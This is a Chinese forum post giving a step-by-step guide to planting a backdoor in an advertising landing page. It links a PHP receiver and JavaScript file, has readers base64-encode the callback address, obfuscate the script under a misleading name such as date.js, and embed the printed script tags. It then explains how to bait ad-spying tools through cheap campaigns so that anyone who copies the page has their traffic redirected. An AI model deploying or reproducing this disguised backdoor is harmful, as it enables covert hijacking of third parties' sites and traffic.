自 一个带后门 Landing Page 的分析 继续讨论:
从说说要做到现在发布已经过去2个月了。。
时光飞逝哈哈哈哈 尴尬
目前 Landing Page 后门系统已经集成到镜像系统内了,之前团了 188 的,找我开永久的镜像系统。
下面直接说下怎么配置
首先,在镜像系统中新增加一个菜单,地址为
backdoor-urls
填写示例:
先看下界面
管理平台弄好了,我们需要增加一个中转机器(用于接收LP 地址),然后给 LP 留一下后门。
一步步来。
接收LP 地址的 php 文件
https://raw.githubusercontent.com/adzon/mirrorphp/master/backdoor/backdoor.php
先将该 php 文件上传到你的服务器中,记住地址,如:
https://demo.test/api.php
将该地址进行 base64 加密( 鍦ㄧ嚎鍔犲瘑瑙e瘑 ),生成字符串
aHR0cHM6Ly9kZW1vLnRlc3QvYXBpLnBocA==
保存下,以备后续使用。
下载依赖 js,将代码进行加密,然后保存到 Landing Page 目录内,起个比较容易混淆的名字。
https://raw.githubusercontent.com/adzon/mirrorphp/master/backdoor/backdoor.js
加密过程我会另起一个文章单独说明。
举例我们将文件命名为 date.js
下面开始将后门代码插入到 Landing Page 内
示例代码
https://raw.githubusercontent.com/adzon/mirrorphp/master/backdoor/backdoor.html
以下代码核心代码,请自行修改后使用。
<!-- 以下是后门代码 请删除注释使用 -->
<script type="text/javascript">
//此处为你的后门地址,请使用 Base64 编码此地址。
var sul = "aHR0cDovL21pcnJvcnBocC50ZXN0L2JhY2tkb29yL2JhY2tkb29yLnBocA==";
</script>
<script type="text/javascript" src="backdoor.js"></script>
<script type="text/javascript">
addLoadEvent(GetDate);
</script>
<!-- 后门代码结束 -->
前文我们获取的地址,以及修改后的 js 文件,对后门代码进行修改,最终代码为:
<script type="text/javascript">
var sul = "aHR0cHM6Ly9kZW1vLnRlc3QvYXBpLnBocA==";
</script>
<script type="text/javascript" src="date.js"></script>
<script type="text/javascript">
addLoadEvent(GetDate);
</script>
然后我们就可以将 Landing Page 进行发布了!
通常我们可以使用以下方式霸占 SPY
1、小流量多 Campaign 的联盟流量(exoclick、popcash 之类的)受众是 ADP 之类的 SPY
2、Facebook 大量低预算 Campaign,受众是 ADSPY 之类的 SPY。
有其他人使用我们的 LP 之后,我们就可以对他的流量进行控制了。
进入 LP 保护后台,右键编辑。
开启跳转,设置好跳转地址即可。
希望大家只将本功能用在自己的 Landing Page 保护上,如果自己加了后门被发现然后被揍了,请默默承担伤痛,感恩。